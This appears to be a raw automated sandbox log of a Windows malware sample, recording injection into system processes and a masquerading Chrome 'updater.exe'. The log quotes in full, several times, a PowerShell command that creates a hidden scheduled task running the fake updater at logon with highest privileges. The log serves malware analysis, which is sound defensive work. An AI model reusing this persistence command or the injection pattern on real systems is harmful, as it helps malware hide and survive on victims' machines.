Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20823A10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 144B2660000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1988E640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F724890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#lbfytpia#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'htfsfilemanager' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'htfsfilemanager' -runlevel 'highest' -force; }	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: dwm.exe, 0000000A.00000000.1758015033.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000A.00000002.3032503633.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000007.00000002.2990549902.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000000.1743987795.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000A.00000000.1758650187.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC6214A0 cpuid

7_2_00000225DC6214A0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
